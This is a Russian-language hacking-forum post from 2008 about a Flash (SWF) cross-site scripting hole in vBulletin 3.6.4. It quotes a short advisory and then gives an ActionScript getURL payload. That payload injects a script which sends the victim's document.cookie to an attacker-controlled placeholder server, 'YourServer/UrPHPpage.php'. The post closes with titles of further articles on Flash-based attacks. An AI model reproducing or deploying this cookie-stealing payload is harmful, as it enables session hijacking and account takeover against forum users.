Показать сообщение отдельно

VBulletin 3.6.4 [FLASH] (SWF) XSS
  #5  
Старый 12.01.2008, 19:13
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами: 10752806

Репутация: 1202


По умолчанию VBulletin 3.6.4 [FLASH] (SWF) XSS

Было много вопросов к посту:

Цитата:
Сообщение от Mr_Necromancer  
VBulletin 3.6.4

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.

Пример:

Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Для интересующихся как это реализуется:

Обзор работы SWF паразита
Подделка заголовков HTTP запроса с помощью Flash ActionScript
Bypassing JavaScript Filters the Flash! Attack
Cross-Domain Data Access via Flash [CDDAF] Reference
Forging HTTP Request Headers with Flash ActionScript

Последний раз редактировалось Elekt; 03.09.2008 в 02:39..
 
Ответить с цитированием